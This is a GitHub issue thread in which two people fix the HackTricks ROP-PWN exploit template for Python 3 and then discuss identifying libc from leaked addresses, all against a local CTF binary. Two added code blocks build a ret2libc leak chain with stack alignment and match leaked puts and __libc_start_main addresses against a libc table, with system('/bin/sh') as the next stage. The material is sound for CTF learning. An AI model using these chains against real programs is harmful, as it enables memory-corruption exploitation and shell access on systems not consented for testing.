Comments (7)

carlospolop avatar carlospolop commented on July 22, 2024 1

Hi @wafflesx90,

The goal of using https://LIBC.blukat.me/ is to identify the libc used by the vulnerable binary.
As not all the libc functions are going to be loaded inside the GOT of the binary (only the ones used), I would recommend you to take a look at the binary and, using the template, exfiltrate the address of more than one libc function used by your binary.
Then, put all the leaked addresses into the website to find which libc is used.

from hacktricks.

carlospolop avatar carlospolop commented on July 22, 2024

Hi @wafflesx90!
I have updated that script and put OFFSET as a bytes type object, could you test it now?

wafflesx90 avatar wafflesx90 commented on July 22, 2024

Greetings,

Thank you for the quick reply. Also, I have tested your updated template in the same environment with the following results.

$ python3 ROP-PWN-template.py
[+] Starting local process './vuln': pid 4816
[*] '/home/palmistry/CTF/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
[*] Loaded 14 cached gadgets for './vuln'
[*] Main start: 0x401156
[*] Puts plt: 0x401054
[*] pop rdi; ret gadget: 0x4011f3
[*] puts GOT @ 0x404018
b'Simple ROP.\n'
Traceback (most recent call last):
  File "ROP-PWN-template.py", line 90, in <module>
    get_addr("puts") #Search for puts address in memmory to obtains libc base
  File "ROP-PWN-template.py", line 81, in get_addr
    leak = u64(recieved.ljust(8, "\x00"))
TypeError: ljust() argument 2 must be a byte string of length 1, not str

carlospolop avatar carlospolop commented on July 22, 2024

After reading those errors I'm starting to think that this template was for Python 2 and not for Python 3.
Anyway, I have fixed that one as well; let me know if that works now.

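The leak stage that the traceback above comes from, written out as an added example. This is my own code, not the HackTricks template and not anything posted in this thread, and it avoids pwntools so it runs anywhere. The gadget, PLT and GOT addresses are the ones the template printed above; the 40-byte padding, the return-slot alignment assumed in align_for_call, and the sample leak line are assumptions or constructed inputs, not facts from the thread. parse_leak shows the Python 3 version of the line that raised the TypeError.

```python
import struct

# Addresses as printed by the template in the thread (the binary has no PIE).
MAIN = 0x401156      # [*] Main start
PUTS_PLT = 0x401054  # [*] Puts plt
POP_RDI = 0x4011f3   # [*] pop rdi; ret gadget
RET = 0x40101a       # [*] ret gadget
PUTS_GOT = 0x404018  # [*] puts GOT

# Assumption: 40 bytes of padding reach the saved return address of the
# vulnerable function. The thread never states the offset for './vuln'.
PADDING = b"A" * 40


def p64(value):
    """Pack one little-endian qword (what pwntools' p64 does)."""
    return struct.pack("<Q", value)


def u64(raw):
    """Unpack one little-endian qword; raw must be exactly 8 bytes."""
    return struct.unpack("<Q", raw)[0]


def align_for_call(chain, target, slot_mod16=8):
    """Insert a bare `ret` so that `target` is entered with a call-like rsp.

    slot_mod16 is rsp mod 16 while it still points at the overwritten return
    address: 8 when the vulnerable function was reached by a normal `call`
    from a 16-byte-aligned caller (assumed here). Each qword the chain
    consumes moves rsp by 8, so rsp on entry to `target` depends on how many
    qwords sit before it. A real `call` leaves rsp == 8 (mod 16) on entry;
    when the chain would leave 0 instead, one extra `ret` restores the parity
    (a misaligned entry crashes on the movaps inside glibc's system/printf).
    """
    ahead = chain.index(target)
    entry = (slot_mod16 + 8 * (ahead + 1)) % 16
    if entry != 8:
        return [RET] + list(chain)
    return list(chain)


def build_leak_chain(func_got, padding=PADDING):
    """pop rdi <- GOT slot; puts(slot) prints the libc address; back to main."""
    chain = align_for_call([POP_RDI, func_got, PUTS_PLT, MAIN], PUTS_PLT)
    return padding + b"".join(p64(q) for q in chain)


def parse_leak(line):
    """Convert what puts wrote for a GOT slot into an integer.

    puts stops at the first NUL and appends '\\n', so a 0x00007f.. address
    arrives as six bytes. On Python 3 the pad must be a bytes object;
    passing "\\x00" (str) is exactly the TypeError shown in the thread.
    """
    raw = line.rstrip(b"\n")[:8]
    return u64(raw.ljust(8, b"\x00"))


if __name__ == "__main__":
    payload = build_leak_chain(PUTS_GOT)
    print("len(rop1) =", len(payload))  # 80 with the assumed padding
    # Constructed: the line p.recvline() would return for the thread's leak.
    sample_line = b"\xa0\x65\x61\x1a\x7f\x7f\n"
    print("puts @", hex(parse_leak(sample_line)))  # 0x7f7f1a6165a0
```

The alignment decision takes the slot parity as a parameter because it is not constant across stages: when stage one comes back into main through a `ret` instead of a `call`, main starts at rsp == 0 (mod 16), and with the usual push rbp / sub rsp prologue the second overwritten return address then also sits at 0 (mod 16), so the same three-qword pop rdi / "/bin/sh" / system chain needs no extra `ret` there (slot_mod16=0). Deciding per chain rather than once is what keeps system() from faulting in one stage while puts() tolerated the misalignment in the other.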
carlospolop avatar carlospolop commented on July 22, 2024

Hi mate,
I have used this template for a CTF challenge and I have improved it.
Test it and let me know if it works for you.

wafflesx90 avatar wafflesx90 commented on July 22, 2024

Cheers,
I was able to successfully execute the updated template and drop into a shell. I really appreciate you taking the time to update the script to Python 3.

Also, I realize this is outside the scope of the original ticket and not related to your script, but I was hoping you could briefly enlighten me on the query fields to leak libc on https://libc.blukat.me

On the website I filled the first query field with 'puts' and applied the following inside the field:
[*] Leaked LIBC address, puts: 0x7f7f1a6165a0

but in your HackTricks series I see you have a field '__libc_start_main' filled out too.

I had the following data before applying a version of libc, and no matter what information I filled into the '__libc_start_main' field it would return an error. The only field that returned several versions of libc was [*] Leaked LIBC address, puts: 0x7f7f1a6165a0, not '__libc_start_main'.

[*] Loaded 14 cached gadgets for './vuln'
[*] Main start: 0x401156
[*] Puts plt: 0x401054
[*] pop rdi; ret gadget: 0x4011f3
[*] ret gadget: 0x40101a
[*] puts GOT @ 0x404018
[*] Payload aligned successfully
b'Simple ROP.\n'
[*] Len rop1: 80
[*] Leaked LIBC address, puts: 0x7f7f1a6165a0
TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)
[*] Switching to interactive mode
Simple ROP.
$ ls
[*] Got EOF while reading in interactive

If this question is outside the scope of the issue or you don't have an explanation, please consider the original issue resolved; I'm happy to close the ticket.

Thanks again!

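Carlos's first comment describes the lookup: leak more than one GOT entry (any symbol the binary actually imports has one, which is why he says to look at the binary first) and give all the addresses to libc.blukat.me so the database can narrow the candidates. The added example below does the same matching offline. It is my own code, not the website's, the template's, or anything from this thread, and it runs against a constructed four-entry database: the build names and offsets are invented, only the puts leak 0x7f7f1a6165a0 comes from the thread, and the __libc_start_main leak is constructed to be consistent with exactly one of the invented builds. It shows why a single leak leaves several candidates and a second one settles it.

```python
PAGE = 0x1000

# Constructed mini-database in the shape of a libc-database entry:
# symbol -> offset from the library base. Builds and offsets are invented
# for this example; real ones come from libc.blukat.me or a local
# libc-database copy. Only the matching logic is the point here.
LIBC_DB = {
    "libc_build_1": {"puts": 0x0875a0, "__libc_start_main": 0x021ab0,
                     "system": 0x04f4e0, "str_bin_sh": 0x1b40fa},
    "libc_build_2": {"puts": 0x0805a0, "__libc_start_main": 0x023a40,
                     "system": 0x04b2e0, "str_bin_sh": 0x1a5c9a},
    "libc_build_3": {"puts": 0x0765a0, "__libc_start_main": 0x024ab0,
                     "system": 0x045390, "str_bin_sh": 0x18cd57},
    "libc_build_4": {"puts": 0x087390, "__libc_start_main": 0x021ab0,
                     "system": 0x04f550, "str_bin_sh": 0x1b3e1a},
}


def identify_libc(leaks, db=LIBC_DB):
    """Return [(build, base)] for every build consistent with all leaks.

    leaks: {symbol_name: runtime address read out of the GOT}.
    ASLR moves the library by whole pages, so for a true match the low 12
    bits of every leaked address must equal those of the stored offset, and
    every leaked symbol must imply the same page-aligned base. One symbol
    only constrains 12 bits; a second one usually kills the coincidences.
    """
    matches = []
    for build, symbols in db.items():
        bases = set()
        for name, addr in leaks.items():
            offset = symbols.get(name)
            if offset is None or (addr & 0xfff) != (offset & 0xfff):
                break
            bases.add(addr - offset)
        else:
            if len(bases) == 1:
                base = bases.pop()
                if base % PAGE == 0:
                    matches.append((build, base))
    return sorted(matches)


def resolve(build, base, symbol, db=LIBC_DB):
    """Runtime address of `symbol` once build and base are known (stage two)."""
    return base + db[build][symbol]


if __name__ == "__main__":
    puts_leak = 0x7f7f1a6165a0  # the address leaked in the thread
    print(identify_libc({"puts": puts_leak}))  # three builds still possible
    # Constructed second leak, as the first comment recommends collecting.
    lsm_leak = 0x7f7f1a5b0ab0
    found = identify_libc({"puts": puts_leak, "__libc_start_main": lsm_leak})
    print(found)  # one build left
    build, base = found[0]
    print(hex(resolve(build, base, "system")),
          hex(resolve(build, base, "str_bin_sh")))
```

With puts alone, builds 1, 2 and 3 all survive: each has a puts offset ending in 0x5a0 and each implies a page-aligned base. Adding __libc_start_main removes build 2 on the low 12 bits and build 3 on base consistency (its offset has the right low bits but implies a different base than its puts offset did), which is the second check worth doing whenever more than one full address is available rather than relying on the 12-bit filter alone.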
wafflesx90 avatar wafflesx90 commented on July 22, 2024

@carlospolop,

I really appreciate you moving the issue to resolved over the weekend and getting back to me on my questions. You have a great deal of knowledge and I hope to see more from you in the very near future!

Cheers,
